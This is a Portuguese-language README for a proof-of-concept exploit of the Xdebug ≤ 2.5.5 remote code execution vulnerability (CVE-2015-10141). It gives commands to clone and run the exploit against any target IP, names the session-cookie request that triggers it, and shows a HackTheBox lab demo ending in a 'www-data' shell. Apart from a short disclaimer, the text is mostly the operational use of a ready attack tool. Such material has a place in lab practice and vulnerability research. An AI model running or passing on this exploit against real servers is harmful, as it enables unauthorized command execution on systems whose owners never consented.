
Script de exploração de Prova de Conceito para Xdebug 2.5.5 e versões anteriores (CVE-2015-10141).
Exploit Python personalizado para Xdebug ≤ 2.5.5 (CVE-2015-10141).
Este repositório contém meu exploit de Prova de Conceito (PoC) para a vulnerabilidade de execução remota de código do Xdebug nas versões 2.5.5 e anteriores.
O script utiliza o protocolo de depuração não autenticado exposto na porta 9000 para alcançar execução remota de comandos.
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py
Quando solicitado, insira o IP alvo onde o Xdebug está hospedado.
Demonstração do meu recente write-up do HackTheBox Olympus (Médio) :
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data
Este projeto é criado apenas para fins educacionais.
NÃO use este exploit contra sistemas sem autorização explícita. Não me responsabilizo por qualquer uso indevido deste código.